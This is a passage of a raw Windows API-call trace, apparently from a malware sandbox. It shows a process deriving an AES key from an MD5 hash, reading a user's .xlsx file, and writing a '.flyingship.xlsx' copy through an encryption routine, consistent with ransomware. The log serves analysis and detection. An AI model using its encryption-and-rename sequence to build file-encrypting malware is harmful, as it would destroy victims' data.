lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1baa3d0, ftCreationTime.dwHighDateTime=0x1d5e0e3, ftLastAccessTime.dwLowDateTime=0x2088d820, ftLastAccessTime.dwHighDateTime=0x1d58a7a, ftLastWriteTime.dwLowDateTime=0x2088d820, ftLastWriteTime.dwHighDateTime=0x1d58a7a, nFileSizeHigh=0x0, nFileSizeLow=0x111a6, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="osHJNd6e0L0ZQQ8NT.xlsx", cAlternateFileName="OSHJND~1.XLS")) returned 0x90ae18 [0176.007] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0176.007] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.007] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.007] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.007] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.007] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0176.007] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.008] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0176.008] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.008] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.008] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0176.008] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.008] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0176.009] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0176.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.010] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0176.010] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.010] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.010] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0176.010] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0176.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.010] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0176.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.010] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.010] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0176.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.011] CryptDestroyHash (hHash=0x90af58) returned 1 [0176.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oshjnd6e0l0zqq8nt.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0176.012] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.012] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0176.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0176.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0176.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0176.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0176.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0176.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0176.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0176.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0176.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0176.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0176.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0176.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0176.015] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0176.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0176.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0176.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0176.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0176.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.016] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.flyingship.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oshjnd6e0l0zqq8nt.flyingship.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0176.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0176.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0176.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0176.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0176.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0176.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0176.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0176.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0176.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0176.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0176.019] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0176.019] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0176.023] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x11a6, lpOverlapped=0x0) returned 1 [0176.023] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0176.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x111a6) returned 0xa7f018 [0176.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0176.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0176.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0176.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0176.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0176.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x111a6) returned 0x9c5180 [0176.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0176.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.027] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0176.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0176.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0176.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x111a6) returned 0xa7f018 [0176.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0176.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0176.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0176.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.028] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0176.028] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0176.028] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0176.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0176.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x111a6) returned 0xa7f018 [0176.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0176.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0176.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0176.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x111a6) returned 0x9d6330 [0176.030] RtlAllocateHeap 